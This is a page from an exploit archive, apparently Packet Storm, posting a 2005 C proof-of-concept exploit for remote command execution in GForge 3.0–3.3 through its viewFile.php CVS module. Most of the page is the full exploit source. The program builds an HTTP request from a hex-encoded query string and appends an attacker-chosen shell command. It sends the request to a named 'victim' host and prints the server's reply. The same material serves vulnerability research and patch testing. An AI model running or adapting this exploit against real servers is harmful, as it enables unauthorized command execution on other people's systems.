exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

GForGE3x.c

GForGE3x.c
Posted Apr 17, 2005
Authored by Lion | Site bastardsoperatorsfromhell.org

GForge 3.x remote command execution exploit that makes use of a flaw in the CVE modules.

tags | exploit, remote
SHA-256 | 3744f3a711daa6de0ebf219d09ae9702a6d0c963ed719af191c9abb3fb0d5ffa

GForGE3x.c

Change Mirror Download
Author: L|On
Homepage: http://www.bastardsoperatorsfromhell.org
Description: GForGE 3.x Remote Execute Command Exploit

GForge ( www.gforge.org) is a software to help collaborative development
for software communities. The software provides a full configured
development system with
tools for communication and version control among members of a
development team on a web site. GForge CVS modules have a remote execute
command
vulnerability exploited by malicious attackers.

Vulnerability Class: FileHandler.class
Version Effect: 3.0 - 3.3 - 4.x no tested

file with badcode:
viewFile.php,v 1.1.1.1 2004/08/09 21:12:16
viewFile.php,v 1.4 2003/10/25 22:46:13

Proof of Concept ExPlOiT by L|On lion@avatarcorp.org :

/***********************************************************
* GFORGE 3.0 - 3.3 POF EXPLOIT ver. 1.0 *
* Remote System Code Execution *
* by L|On 06 Apr 2005 *
* lion@avatarcorp.org - www.bastardsoperatorsfromhell.org *
* Thank's to all brother on #BOFH.IT *
***********************************************************/


#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>

#define MAX_SIZE 1
#define DEF_PATH "/scm/viewFile.php"
#define FALSE -1
#define TRUE 0

void usage_form(char *cmd){
fprintf(stderr,"\nGForGE 3.0 - 3.3 POF ExPlOiT by L|On 06 Apr
2005\n"
"lion@avatarcorp.org -
www.bastardsoperatorsfromhell.org\n"
"-------------------------------------------------\n"
"Usage: %s -t <target> [-l <link_path>] [-c
<cmd_send>] [-h]\n\n"
"target : victim_host\n"
"link_path : fukk path where locate bad php
file (default: /scm/viewFile.php)\n"
"cmd_send : command to send victim to test
bug\n\n", cmd);
exit(1);
}

int main(int argc, char *argv[])
{
int s, i = 0;
int testbug = FALSE;
struct sockaddr_in victem;
struct hostent *he;
char opt;
char location[50] = DEF_PATH;
char *evilcode;
char *target = NULL;
char *buffer;
char cgibuff[40000];
char *temp[MAX_SIZE + 2];
char *name[MAX_SIZE + 2];
char *get_html = "GET ";
char *host_html = "Host: ";

char *vcode={"\x3f\x67\x72\x6f\x75\x70\x5f\x69\x64\x3d\x35\x26"
"\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x3d\x25\x30"
"\x41"};

while((opt = getopt(argc, argv, "t:l:c:h")) != EOF){
switch(opt)
{
case 't':
target = optarg;
break;
case 'l':
location[0] = '\0';
strcat(location, optarg);
break;
case 'c':
testbug = TRUE;
evilcode = optarg;
break;
case 'h':
usage_form(argv[0]);
break;
}
}
if(target == NULL){
fprintf(stderr,"No target specified, try -h for help\n");
exit(1);
}

temp[1] = malloc(1000);

strcat(temp[1], vcode);
strcat(temp[1], evilcode);
strcat(temp[1], "%0a HTTP/1.0\n");


if ((he=gethostbyname(target)) == NULL) exit(printf("Error getting
hostname"));

name[1] = "Send Evil Code...";

while(i++ < MAX_SIZE){
if((buffer = (char *) malloc (strlen(get_html) +
strlen(location) + strlen(temp[1]) + strlen(host_html) + strlen(target)
+ 1)) == NULL){
perror("(malloc buffer)");
exit(2);
}

strcat(buffer, get_html);
strcat(buffer, location);
strcat(buffer, temp[1]);
strcat(buffer, host_html);
strcat(buffer, target);
strcat(buffer, "\n");

if (testbug == TRUE) strcat(buffer, "\n");

printf("\n%s** %d\n\n", buffer, strlen(buffer));

s=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&victem.sin_addr, he->h_length);
victem.sin_family=AF_INET;
victem.sin_port=htons(80);

if (connect(s, (struct sockaddr*)&victem, sizeof(victem))<0)
exit(printf("Connect error"));

cgibuff[0] = '\0';

fprintf(stderr,"%s...",name[1]);
send(s, buffer, strlen(buffer),0);

if (testbug == TRUE){
recv(s, cgibuff, sizeof(cgibuff),MSG_WAITALL); // MSG_WAITALL for
recive entire text
if(strlen(cgibuff) != 0) fprintf(stderr,"\n%s\n", cgibuff);
close(s);
exit(0);
}
printf("DONE\n");
close(s);
buffer[0] = '\0';

}
return 0;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close